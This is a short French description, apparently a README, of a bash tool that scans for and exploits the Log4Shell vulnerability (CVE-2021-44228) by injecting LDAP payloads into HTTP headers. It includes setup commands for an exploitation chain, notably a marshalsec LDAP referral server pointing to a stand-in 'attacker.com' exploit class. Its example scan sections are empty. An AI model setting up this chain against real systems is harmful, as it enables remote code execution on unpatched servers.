
Script bash qui permet d'identifier la vulnérabilité Log4j CVE-2021-44228 à distance.
Script en bash permettant d'identifier et/ou d'exploiter la vulnérabilité Log4shell à distance. Cet outil effectue différents tests en utilisant des payloads LDAP et les en-têtes X-Api-Version, User-Agent et X-Forwarded-For.
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
Nous activons un serveur HTTP python3 -m http.server 8080
Avoir Java installé #sudo apt install default-jre
Avoir Curl installé #sudo apt-get install curl
Saisir les paramètres suivants :
#Exemple de scan d'application en réseau interne :

#Exemple de scan d'application sur Internet :
